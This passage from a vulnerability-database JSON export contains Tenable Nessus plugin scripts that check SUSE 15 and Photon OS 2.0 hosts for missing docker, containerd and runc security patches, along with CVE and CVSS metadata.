"p-cpe:/a:novell:suse_linux:golang-github-docker-libnetwork", "p-cpe:/a:novell:suse_linux:golang-github-docker-libnetwork-kubic", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2019-2117-1.NASL", "href": "https://www.tenable.com/plugins/nessus/127884", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2019:2117-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(127884);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2018-10892\",\n \"CVE-2019-5736\",\n \"CVE-2019-13509\",\n \"CVE-2019-14271\"\n );\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0725\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : containerd, docker, docker-runc, golang-github-docker-libnetwork (SUSE-SU-2019:2117-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for containerd, docker, docker-runc,\ngolang-github-docker-libnetwork fixes the following issues :\n\nDocker :\n\nCVE-2019-14271: Fixed a code injection if the nsswitch facility\ndynamically loaded a library inside a chroot (bsc#1143409).\n\nCVE-2019-13509: Fixed an information leak in the debug log\n(bsc#1142160).\n\nUpdate to version 19.03.1-ce, see changelog at\n/usr/share/doc/packages/docker/CHANGELOG.md (bsc#1142413,\nbsc#1139649).\n\nrunc: Use %config(noreplace) for /etc/docker/daemon.json\n(bsc#1138920).\n\nUpdate to runc 425e105d5a03, which is required by Docker\n(bsc#1139649).\n\ncontainerd: CVE-2019-5736: Fixed a container breakout vulnerability\n(bsc#1121967).\n\nUpdate to containerd v1.2.6, which is required by docker\n(bsc#1139649).\n\ngolang-github-docker-libnetwork: Update to version\ngit.fc5a7d91d54cc98f64fc28f9e288b46a0bee756c, which is required by\ndocker (bsc#1142413, bsc#1139649).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1100331\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1121967\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1138920\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1139649\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1142160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1142413\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1143409\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-10892/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-13509/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-14271/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-5736/\");\n # https://www.suse.com/support/update/announcement/2019/suse-su-20192117-1/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b0a9a6ef\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Open Buildservice Development Tools\n15-SP1:zypper in -t patch\nSUSE-SLE-Module-Development-Tools-OBS-15-SP1-2019-2117=1\n\nSUSE Linux Enterprise Module for Open Buildservice Development Tools\n15:zypper in -t patch\nSUSE-SLE-Module-Development-Tools-OBS-15-2019-2117=1\n\nSUSE Linux Enterprise Module for Containers 15-SP1:zypper in -t patch\nSUSE-SLE-Module-Containers-15-SP1-2019-2117=1\n\nSUSE Linux Enterprise Module for Containers 15:zypper in -t patch\nSUSE-SLE-Module-Containers-15-2019-2117=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-5736\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2019-14271\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Docker Container Escape Via runC Overwrite');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:containerd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:containerd-ctr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:containerd-kubic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:containerd-kubic-ctr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:docker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:docker-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:docker-kubic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:docker-kubic-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:docker-kubic-kubeadm-criconfig\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:docker-kubic-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:docker-kubic-test-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:docker-libnetwork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:docker-libnetwork-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:docker-libnetwork-kubic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:docker-libnetwork-kubic-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:docker-runc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:docker-runc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:docker-runc-kubic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:docker-runc-kubic-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:docker-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:docker-test-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:golang-github-docker-libnetwork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:golang-github-docker-libnetwork-kubic\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(0|1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0/1\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(0|1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP0/1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"containerd-1.2.6-5.16.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"containerd-ctr-1.2.6-5.16.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"containerd-kubic-1.2.6-5.16.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"containerd-kubic-ctr-1.2.6-5.16.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"docker-19.03.1_ce-6.26.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"docker-debuginfo-19.03.1_ce-6.26.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"docker-kubic-19.03.1_ce-6.26.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"docker-kubic-debuginfo-19.03.1_ce-6.26.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"docker-kubic-kubeadm-criconfig-19.03.1_ce-6.26.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"docker-kubic-test-19.03.1_ce-6.26.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"docker-kubic-test-debuginfo-19.03.1_ce-6.26.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"docker-libnetwork-0.7.0.1+gitr2800_fc5a7d91d54c-4.15.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"docker-libnetwork-debuginfo-0.7.0.1+gitr2800_fc5a7d91d54c-4.15.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"docker-libnetwork-kubic-0.7.0.1+gitr2800_fc5a7d91d54c-4.15.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"docker-libnetwork-kubic-debuginfo-0.7.0.1+gitr2800_fc5a7d91d54c-4.15.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"docker-runc-1.0.0rc8+gitr3826_425e105d5a03-6.21.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"docker-runc-debuginfo-1.0.0rc8+gitr3826_425e105d5a03-6.21.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"docker-runc-kubic-1.0.0rc8+gitr3826_425e105d5a03-6.21.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"docker-runc-kubic-debuginfo-1.0.0rc8+gitr3826_425e105d5a03-6.21.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"docker-test-19.03.1_ce-6.26.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"docker-test-debuginfo-19.03.1_ce-6.26.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"golang-github-docker-libnetwork-0.7.0.1+gitr2800_fc5a7d91d54c-4.15.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"golang-github-docker-libnetwork-kubic-0.7.0.1+gitr2800_fc5a7d91d54c-4.15.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"containerd-1.2.6-5.16.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"containerd-ctr-1.2.6-5.16.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"docker-19.03.1_ce-6.26.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"docker-debuginfo-19.03.1_ce-6.26.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"docker-libnetwork-0.7.0.1+gitr2800_fc5a7d91d54c-4.15.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"docker-libnetwork-debuginfo-0.7.0.1+gitr2800_fc5a7d91d54c-4.15.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"docker-runc-1.0.0rc8+gitr3826_425e105d5a03-6.21.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"docker-runc-debuginfo-1.0.0rc8+gitr3826_425e105d5a03-6.21.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"docker-test-19.03.1_ce-6.26.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"docker-test-debuginfo-19.03.1_ce-6.26.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"golang-github-docker-libnetwork-0.7.0.1+gitr2800_fc5a7d91d54c-4.15.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"containerd-ctr-1.2.6-5.16.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"containerd-kubic-1.2.6-5.16.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"containerd-kubic-ctr-1.2.6-5.16.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"docker-debuginfo-19.03.1_ce-6.26.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"docker-kubic-19.03.1_ce-6.26.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"docker-kubic-debuginfo-19.03.1_ce-6.26.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"docker-kubic-kubeadm-criconfig-19.03.1_ce-6.26.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"docker-kubic-test-19.03.1_ce-6.26.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"docker-kubic-test-debuginfo-19.03.1_ce-6.26.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"docker-libnetwork-kubic-0.7.0.1+gitr2800_fc5a7d91d54c-4.15.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"docker-libnetwork-kubic-debuginfo-0.7.0.1+gitr2800_fc5a7d91d54c-4.15.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"docker-runc-kubic-1.0.0rc8+gitr3826_425e105d5a03-6.21.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"docker-runc-kubic-debuginfo-1.0.0rc8+gitr3826_425e105d5a03-6.21.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"docker-test-19.03.1_ce-6.26.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"docker-test-debuginfo-19.03.1_ce-6.26.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"golang-github-docker-libnetwork-0.7.0.1+gitr2800_fc5a7d91d54c-4.15.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"golang-github-docker-libnetwork-kubic-0.7.0.1+gitr2800_fc5a7d91d54c-4.15.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"containerd-ctr-1.2.6-5.16.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"docker-debuginfo-19.03.1_ce-6.26.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"docker-test-19.03.1_ce-6.26.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"docker-test-debuginfo-19.03.1_ce-6.26.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"golang-github-docker-libnetwork-0.7.0.1+gitr2800_fc5a7d91d54c-4.15.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"containerd / docker / docker-runc / golang-github-docker-libnetwork\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T15:05:39", "description": "An update of the docker package has been released.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-07T00:00:00", "type": "nessus", "title": "Photon OS 2.0: Docker PHSA-2019-2.0-0193", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14271"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:docker", "cpe:/o:vmware:photonos:2.0"], "id": "PHOTONOS_PHSA-2019-2_0-0193_DOCKER.NASL", "href": "https://www.tenable.com/plugins/nessus/132677", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2019-2.0-0193. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132677);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-14271\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0725\");\n\n script_name(english:\"Photon OS 2.0: Docker PHSA-2019-2.0-0193\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the docker package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-2-193.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-14271\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/07/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:docker\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 2.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-2.0\", cpu:\"x86_64\", reference:\"docker-18.06.2-5.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", cpu:\"x86_64\", reference:\"docker-doc-18.06.2-5.ph2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"docker\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-10T14:55:24", "description": "An update of the containerd package has been released.", "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 5.2, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 2.7}, "published": "2020-12-03T00:00:00", "type": "nessus", "title": "Photon OS 2.0: Containerd PHSA-2020-2.0-0301", "bulletinFamily": "scanner", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15257"], "modified": "2021-01-27T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:containerd", "cpe:/o:vmware:photonos:2.0"], "id": "PHOTONOS_PHSA-2020-2_0-0301_CONTAINERD.NASL", "href": "https://www.tenable.com/plugins/nessus/143446", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2020-2.0-0301. The text\n# itself is copyright (C) VMware, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143446);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/27\");\n\n script_cve_id(\"CVE-2020-15257\");\n\n script_name(english:\"Photon OS 2.0: Containerd PHSA-2020-2.0-0301\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the containerd package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-2-301.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-15257\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:containerd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/PhotonOS/release');\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, 'PhotonOS');\nif (release !~ \"^VMware Photon (?:Linux|OS) 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, 'PhotonOS 2.0');\n\nif (!get_kb_item('Host/PhotonOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'PhotonOS', cpu);\n\nflag = 0;\n\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'containerd-1.3.7-1.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'containerd-doc-1.3.7-1.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'containerd-extras-1.3.7-1.ph2')) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'containerd');\n}\n", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2023-02-10T14:54:35", "description": "An update of the containerd package has been released.", 